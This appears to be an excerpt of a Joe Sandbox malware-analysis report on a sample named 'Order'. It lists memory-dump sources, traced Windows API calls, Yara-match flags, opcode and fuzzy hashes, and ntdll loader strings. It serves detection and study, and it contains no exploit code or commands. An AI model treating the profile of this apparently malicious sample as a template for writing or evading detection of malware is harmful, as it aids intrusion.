                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da8135d8fef73b7c6e025886a9cb57f3c1446430a9a19a27ad986646a4b2fd6c
                                                                                                                                    • Instruction ID: cd48262952b793dc5265ab92d9b10397b9be7361b40aca4a0b655698aacb6e55
                                                                                                                                    • Opcode Fuzzy Hash: da8135d8fef73b7c6e025886a9cb57f3c1446430a9a19a27ad986646a4b2fd6c
                                                                                                                                    • Instruction Fuzzy Hash: 46E12AB4E001599FCB14DFA9C5909AEFBF2FF89304F248169E414AB35AD731A942CF64
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1744932996.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_4fe0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f5115a8f57b5bd7a94dd1d43d858314fe02b289f2cf4b080b045da125c949952
                                                                                                                                    • Instruction ID: 5aba11c37291fd7dcdbaf67d028e9dc3bbd312d879aefeb0fc3811514f35f620
                                                                                                                                    • Opcode Fuzzy Hash: f5115a8f57b5bd7a94dd1d43d858314fe02b289f2cf4b080b045da125c949952
                                                                                                                                    • Instruction Fuzzy Hash: BDD10C31D1075A9ACB01EB64D9906EDB7B1FF95300F50C7AAE00977225EBB0BAD9CB41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1744932996.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_4fe0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c6d72e47251de58c207c83844071d8c4873ca9a230c72b491eeb90b747555f2a
                                                                                                                                    • Instruction ID: e5020e068a8d0b09895907ed08d0d6b133a7b774c6d4fe2c665b3be660811f54
                                                                                                                                    • Opcode Fuzzy Hash: c6d72e47251de58c207c83844071d8c4873ca9a230c72b491eeb90b747555f2a
                                                                                                                                    • Instruction Fuzzy Hash: CFD1F931D1075A9ACB01EB64D990A9DB7B1FF95300F5087AAE00977225EBB0BAC9CB41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0b32802d3e384f8c52c722b49a961bd3a0187133614f02ecc16917307f898727
                                                                                                                                    • Instruction ID: 3404b35d388339a28f06260b0f806f1ab391ec2cd4ff3c9ee90062cc4b895388
                                                                                                                                    • Opcode Fuzzy Hash: 0b32802d3e384f8c52c722b49a961bd3a0187133614f02ecc16917307f898727
                                                                                                                                    • Instruction Fuzzy Hash: 1EA15C36E00205DFCF05DFA5C8405DEB7B2FF86300B2585BAE816AB265DB71D996EB40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fa7550a3d021201d49ba7c451c71bbf346909349392ac5354730c4fea7c52442
                                                                                                                                    • Instruction ID: 930cb355b1a79da6c0ee74b88e4142b61c658a70e2efa0405bea953e63ad47d8
                                                                                                                                    • Opcode Fuzzy Hash: fa7550a3d021201d49ba7c451c71bbf346909349392ac5354730c4fea7c52442
                                                                                                                                    • Instruction Fuzzy Hash: 7351FCB4E002198BDB14CFAAC5805AEFBF2FF89314F24C169D458A7356D7359A42CF61

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:1.2%
                                                                                                                                    Dynamic/Decrypted Code Coverage:5.2%
                                                                                                                                    Signature Coverage:8.1%
                                                                                                                                    Total number of Nodes:135
                                                                                                                                    Total number of Limit Nodes:11

Control-flow Graph

APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
Memory Dump Source
• Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_Order.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 352a911c7d75b054859a4398694d1711e84ed81b6f2a009f0faaad9a1ff4d0c8
• Instruction ID: c7a968f45a459e0633ba3b3c9d85e8edd550cd31cb490a104a89d8a481d041c1
• Opcode Fuzzy Hash: 352a911c7d75b054859a4398694d1711e84ed81b6f2a009f0faaad9a1ff4d0c8
• Instruction Fuzzy Hash: BA0152B5E0010DA7DB10DAA5DC42FDEB3789B14308F4041A6E90897240F635EB588B95

Control-flow Graph

APIs
• NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8E7
Memory Dump Source
• Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_Order.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
• Instruction ID: d5d408aa627ccc7809f1817482fdcd7888bd1ae54e0b5777c1bc992e71757020
• Opcode Fuzzy Hash: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
• Instruction Fuzzy Hash: 95E04F363002147BDA20BA5ADC41FDB775CDBC9754F004419FB0DA7282D670BA0086E5

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: bc3d688c0b955a063a5969feb3018bfcb8362d47620c2c3c4fea9c0641ccdcde
• Instruction ID: afa99401afe53eef8c3d5ae555dc654668b1ce990bd3b89390feeba8c3b4adc4
• Opcode Fuzzy Hash: bc3d688c0b955a063a5969feb3018bfcb8362d47620c2c3c4fea9c0641ccdcde
• Instruction Fuzzy Hash: 31900261203504034605715C4418616804E97E1201B55C025E1058590DC52A89916229

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 2e4b8ebbe464968644c401eeaf8dd560f5baa1b40674d0ac2a130cd0aee7c856
• Instruction ID: 5e94db89906ec16af423fb82357e47a7ea0950bec20c1afcf252967b32f43ebe
• Opcode Fuzzy Hash: 2e4b8ebbe464968644c401eeaf8dd560f5baa1b40674d0ac2a130cd0aee7c856
• Instruction Fuzzy Hash: 8390023120250813D611715C4508707404D97D1241F95C416A0468558DD65B8A52A225

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 2f6cd40fa9eef01796a1927e0609b4ba8c3dba1c62f70be6431c80a14f9d26f6
• Instruction ID: b0df72744652b7c31aaf92622abfe7fb6aebb94900d9c1cf9ab1b118f9517fe9
• Opcode Fuzzy Hash: 2f6cd40fa9eef01796a1927e0609b4ba8c3dba1c62f70be6431c80a14f9d26f6
• Instruction Fuzzy Hash: C390023120258C02D610715C840874A404997D1301F59C415A4468658DC69A89917225
APIs
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c0c939a93c28b8e75feb20c56ecad97798810c0564ebd9198a77f6635aa1a648
• Instruction ID: 557956d374679bc0f0bbbf64abfedf452f7dee8df8cd1024f2f95341178e4442
• Opcode Fuzzy Hash: c0c939a93c28b8e75feb20c56ecad97798810c0564ebd9198a77f6635aa1a648
• Instruction Fuzzy Hash: 5A90023160660802D600715C4518706504997D1201F65C415A0468568DC79A8A5166A6

Control-flow Graph

APIs
• PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00414260
Strings
Memory Dump Source
• Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_Order.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 1863I7301$1863I7301
• API String ID: 1836367815-3745599348
• Opcode ID: f82b3489c07bb7bba87b4eb726f7e6691780f768484c8221fa741478fa425193
• Instruction ID: 849ad6b5b06dd9d477bcae3cc8e4cc54e2323083547425b7802f2d85772a6ce4
• Opcode Fuzzy Hash: f82b3489c07bb7bba87b4eb726f7e6691780f768484c8221fa741478fa425193
• Instruction Fuzzy Hash: E8012671E4021876EB11A6E19C02FDFBB7C9F40B54F04805AFE047B2C1D7B866468BEA

Control-flow Graph

APIs
• PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00414260
Strings
Memory Dump Source
• Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_Order.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 1863I7301$1863I7301
• API String ID: 1836367815-3745599348
• Opcode ID: a3f97eb2583523ad50d7cc5734a062fdc3966a9ffe998e370a34981ffe5104b2
• Instruction ID: 6a1d244d1ea9186ec68e0d3c22f4e0bd750b285f4891b0904ac5698ca7436c9e
• Opcode Fuzzy Hash: a3f97eb2583523ad50d7cc5734a062fdc3966a9ffe998e370a34981ffe5104b2
• Instruction Fuzzy Hash: A301D671E4021876EB11A6E19C42FDFBB7C9F41B54F04805AFE047B2C1D6B866468BEA

Control-flow Graph

APIs
• RtlAllocateHeap.NTDLL(?,0041E7BE,?,?,00000000,?,0041E7BE,?,?,?), ref: 0042CC22
Memory Dump Source
• Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_Order.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: b6deca932c6654ca86d4eb412088f9019d810c86403fd3c820abf9ad62f2039c
• Instruction ID: 1503fd3026b6a6c884018fb1076d2efb6d6f5d3df5eecbcf58bdfa754225d855
• Opcode Fuzzy Hash: b6deca932c6654ca86d4eb412088f9019d810c86403fd3c820abf9ad62f2039c
• Instruction Fuzzy Hash: B7E06D762042047BDA10EE59DC41FDB37ACEFC8714F004419FE08A7241E770B9108AB8

Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C4830C75,00000007,00000000,00000004,00000000,0041720F,000000F4), ref: 0042CC72
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_Order.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0

Control-flow Graph

control_flow_graph 95 42cc83-42ccbc call 404843 call 42db13 ExitProcess
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,174F840D,?,?,174F840D), ref: 0042CCB7
Memory Dump Source
• Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_Order.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0

Control-flow Graph

control_flow_graph 100 1982c0a-1982c0f 101 1982c1f-1982c26 LdrInitializeThunk 100->101 102 1982c11-1982c18 100->102
APIs
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
Strings
• double initialized or corrupted critical section, xrefs: 019B5508
• Critical section address, xrefs: 019B5425, 019B54BC, 019B5534
• Thread identifier, xrefs: 019B553A
• Critical section debug info address, xrefs: 019B541F, 019B552E
• 8, xrefs: 019B52E3
• Critical section address., xrefs: 019B5502
• corrupted critical section, xrefs: 019B54C2
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B54CE
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B540A, 019B5496, 019B5519
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B54E2
• Thread is in a state in which it cannot own a critical section, xrefs: 019B5543
• Invalid debug info address of this critical section, xrefs: 019B54B6
• undeleted critical section in freed memory, xrefs: 019B542B
• Address of the debug info found in the active list., xrefs: 019B54AE, 019B54FA
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
Strings
• SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019B25EB
• SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019B22E4
• SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 019B2412
• SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 019B2602
• RtlpResolveAssemblyStorageMapEntry, xrefs: 019B261F
• @, xrefs: 019B259B
• SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019B24C0
• SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 019B2498
• SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 019B2409
• SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 019B2624
• SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 019B2506
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
• API String ID: 0-4009184096
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
Strings
• VerifierDlls, xrefs: 019C8CBD
• VerifierDebug, xrefs: 019C8CA5
• VerifierFlags, xrefs: 019C8C50
• AVRF: -*- final list of providers -*- , xrefs: 019C8B8F
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 019C8A67
• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 019C8A3D
• HandleTraces, xrefs: 019C8C8F
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
                                                                                                                                    • Opcode ID: a42fb4fd5549614875b4e252be6bbe3c2217ff86f09e9a3d4aec93651bf5ac38
                                                                                                                                    • Instruction ID: e7d02a75a9758377cdd10d633e5d3dc2fdef89ba3d85b210050c293e44af518f
                                                                                                                                    • Opcode Fuzzy Hash: a42fb4fd5549614875b4e252be6bbe3c2217ff86f09e9a3d4aec93651bf5ac38
                                                                                                                                    • Instruction Fuzzy Hash: 26A26870E0562A8FDB64CF18CC88BA9BBB5BF89705F5442E9D90DA7250DB749E84CF40
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-792281065
                                                                                                                                    • Opcode ID: 87dca22ece9a59b2550f97d14bb9d6919d73a53b859edcade862ffc72fda43ed
                                                                                                                                    • Instruction ID: 8a194ece3d4de41b333b8f4e2f7a5b87996a2832fea06b3a84af365a9bb0e240
                                                                                                                                    • Opcode Fuzzy Hash: 87dca22ece9a59b2550f97d14bb9d6919d73a53b859edcade862ffc72fda43ed
                                                                                                                                    • Instruction Fuzzy Hash: E8913730F04715EBFB25DF58DD84BEA7BA9BF91B24F000129E50D6B286D7749802D791
                                                                                                                                    Strings
                                                                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01999A2A
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01999A11, 01999A3A
                                                                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01999A01
                                                                                                                                    • apphelp.dll, xrefs: 01936496
                                                                                                                                    • LdrpInitShimEngine, xrefs: 019999F4, 01999A07, 01999A30
                                                                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019999ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-204845295
                                                                                                                                    • Opcode ID: 3b45b53a79fc4be7a96cacdb3ee8bab821aaab35fdabceb06afe90d3d25286d5
                                                                                                                                    • Instruction ID: ab0a350b402af3bb2dc1046fe3a4a588fd06eb77cb8e41e0e754b737fd6f013d
                                                                                                                                    • Opcode Fuzzy Hash: 3b45b53a79fc4be7a96cacdb3ee8bab821aaab35fdabceb06afe90d3d25286d5
                                                                                                                                    • Instruction Fuzzy Hash: 46518071608305ABEB25DF28D841FAB7BE9FFC4648F00091DF58D971A4D634EA45CB92
                                                                                                                                    Strings
                                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 019B8181, 019B81F5
                                                                                                                                    • LdrpInitializeProcess, xrefs: 0197C6C4
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0197C6C3
                                                                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 019B8170
                                                                                                                                    • LdrpInitializeImportRedirection, xrefs: 019B8177, 019B81EB
                                                                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 019B81E5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                    • API String ID: 0-475462383
                                                                                                                                    • Opcode ID: d94202eb90cd8a836f791c6066bd642b39baf3d65f891bcdd6fa8204d0808afe
                                                                                                                                    • Instruction ID: ea764fe4f38fe3e067b68167b6160267f75f99d61f8de29df03e62620820e8e4
                                                                                                                                    • Opcode Fuzzy Hash: d94202eb90cd8a836f791c6066bd642b39baf3d65f891bcdd6fa8204d0808afe
                                                                                                                                    • Instruction Fuzzy Hash: 3B31F271644307ABC224EF68DD86E6A77D8FFD4B10F04051CF98CAB295E620ED05CBA2
                                                                                                                                    Strings
                                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 019B2180
                                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 019B2178
                                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019B21BF
                                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 019B2165
                                                                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 019B219F
                                                                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 019B2160, 019B219A, 019B21BA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                    • API String ID: 0-861424205
                                                                                                                                    • Opcode ID: 2081ec510071fe228d9571558058928c86d0dcdd046ed9135bd8d0fa0f2ccab4
                                                                                                                                    • Instruction ID: 3886ed3491a10ab646e154eb00e9c9a43d99f6cc655cf7a3667b0a3d12fd58f4
                                                                                                                                    • Opcode Fuzzy Hash: 2081ec510071fe228d9571558058928c86d0dcdd046ed9135bd8d0fa0f2ccab4
                                                                                                                                    • Instruction Fuzzy Hash: 3031E936F402257BF7218B998DC5FAABB79EFA4A50F050059FB0C77245D270AA01C6A1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01982DF0: LdrInitializeThunk.NTDLL ref: 01982DFA
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980BA3
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980BB6
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980D60
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980D74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1404860816-0
                                                                                                                                    • Opcode ID: 7514136761c2a554b29e07739d21aab689c7ca1ad212b997c3e683cbccc19581
